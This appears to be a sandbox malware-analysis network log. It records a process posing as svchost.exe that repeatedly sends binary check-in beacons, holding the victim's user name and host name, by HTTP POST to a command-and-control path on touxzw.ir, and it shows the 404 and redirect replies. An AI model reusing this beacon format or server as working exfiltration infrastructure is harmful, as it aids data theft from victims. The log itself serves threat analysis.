Feb 27, 2025 23:42:41.218130112 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:41.224735975 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:41.855597973 CET	848	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WdECQiVQWh9Q4ttYIBx7dKNGi1l4Z1191iwfVbjJF5TT3ve%2BtjP5Jo44cvOOd%2F9dfE%2Fwo%2BGPWehxo6sCWwKr7icmj2z3A5kgMb4%2BsnenautFOkP%2BRZxG3CY7zfw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb082282d41b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1727&rtt_var=863&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49993	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:43.016216040 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:43.021533012 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:43.767069101 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PK0uNHzmjD0qN2Oz6A0cjYGpGP%2FX8%2BGiO8WceApamSqh%2BVdQpRQDMQrSj3lv3Y3H8oRW0t9Ng6jLlGjAnkjQ64eKNBxY4OMISR3s4AgKVvOs%2BC0tHNLFr8l5Hqo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb08d5f85f5f7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50006	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:44.945250034 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:44.950480938 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:45.743223906 CET	823	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:45 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vLyWtF8V%2FLnBJFOymJZGDI3mpykvmtpKD%2BOtub75jWni4xEdZA9FT7czS93e8pqA%2FSkeNMpG2Xl3rjO3hvDqIEf7w745s7bvHg7KkO8462u9LEeiBUCn2vUQ65M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb099ceba184d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11380&min_rtt=11380&rtt_var=5690&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50020	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:46.927897930 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:46.933140039 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:47.553442001 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N9Svhyvx3%2BLGL4UbK3pBFqflB2V%2BRCDPuzljm1S%2FSXBKkUbs7%2BIWu5b5nYDkuNEfpxF7irVC0V4MO%2BUAtL2jilBoeimD1WqMCbdcYn60RSO77fYAc5jZKp0ZSTU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb0a5cc9480df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1729&rtt_var=864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50031	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:48.709428072 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:48.714574099 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:49.501873016 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:49 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ccAbe1bwS%2BMZOmbHx9R3h7Sl6Bwdx%2BATSk%2F9vZZTjuTKEq7FrmOh1zwdHwu3Kwltg0pyklAWsCDfsvYADJLy6RUDkb0HzZW7mTHFjPtgjvyJcBYlq7xgL0qTrnk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb0b12f1c4356-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1884&min_rtt=1884&rtt_var=942&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50044	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:50.660828114 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:50.665973902 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:51.442588091 CET	839	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTQnySwUMy1ceLu2jw8bstLUykKq9QKusgK2X5L0boxjq%2BG9b4k1hK0xwZy8WdUc0NoVpJQ%2Fs0YMsoJXoETrkckAsZSoOz6EdekOnUqvcZMQNWXNpZ44lnvRAUI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb0bd297cf02d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=93&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	50052	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:52.595768929 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:52.600949049 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:53.390496969 CET	852	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rswfNqRkzLk9Ub%2FrobD9vOVqcgN%2Bi%2BFxAfji29iJTMmX4rY4EDNsekAu3JSGuVFcDVqjkKa3ei%2Fw%2BecBltBsoOA%2BwWQzW7IN9CAb%2FSyeJHVUPS0tOf%2FpDMaTvj0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb0c95f3c7298-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1968&rtt_var=984&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	50053	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:54.550208092 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:54.555373907 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:55.315660954 CET	828	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:55 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LxaY79NRr0omON81a%2Bkg1dZpFloWEoGrOTRqLl4vE5%2Fl6J7jQOplClwAM%2FtVItVR%2F5K%2BFYAhpIIFXQDwxZfrHAL%2BTmOxC3qbHVpzaYvtNVHL87H1WohsK3%2BrlR4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb0d59ba2c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	50054	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:56.501636982 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:56.506891012 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:57.248605013 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:57 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xan%2BvGxSMBeNbzkgfJwcKJLLHO8LboS8QVHY5qLWWTraRjuRtCCYxRUifyYuDVfgTXyMUKXXlTK1meCha1TX3RvQAFfbQIu75QkLTrg%2FhcGXYD4WCh0cp60%2B4sk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb0e1bda243dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1651&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50055	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:58.404495001 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:58.409662962 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:59.189064980 CET	845	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltUCeTotNXIesHqjx12MpSu%2Fx5dSXhAfUJ2jOOhzdjKNT1CmEY%2Byfb%2Fa%2Fb81BBBp6wpkGtnx7CifvZCCDXVEJDUJOs09eYF5QaD2pNTEH6kbyJTN0ICkxwMXiQ8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb0ed8b6543e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2249&min_rtt=2249&rtt_var=1124&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	50056	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:43:00.597058058 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:43:00.602247953 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:43:01.243894100 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:43:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhfWHF0wM86w7%2FBzRO0%2Bku%2BCW9KM%2FlVV3UfTV5DkajMzPWAf4UeIc8AN04LHoWPxAZg5O1JdjQD38FQh%2BIqGNUk6t61ClQF3djxh1SQDIapX5yIQ5Al8FlOxN2Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb0fb4d2742f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1803&rtt_var=901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50057	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:43:02.412352085 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:43:02.418607950 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:43:03.137861967 CET	828	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:43:03 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxrzC6%2F5Gk%2BceywheKex9Cs6joYhQNyWvbuF8A%2FD3hdmI1dTjqIkILN%2BQ%2Brewroht%2BjkdkF2a1nGQVpDCrqypkBWG%2F0EhHNzGFPhZqvcpiCmEp39kxpJvLGEWhM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb106990f4201-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1657&rtt_var=828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50058	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:43:04.442754984 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:43:04.447901011 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:43:05.096396923 CET	848	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:43:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IilKN8aBdM00J67RzLpv%2B%2BzroN7%2BMdoPFnxBJ0a65sgfunePSVUuKQk%2FayCq0%2B1lA2frh1FF1FAsiJHbdUGJw05tv%2Fym2kvxitVKX0kSpz7EpFjwGaO0wjDd374%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb1136f6842f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1717&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	50059	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:43:06.268534899 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:43:06.273683071 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
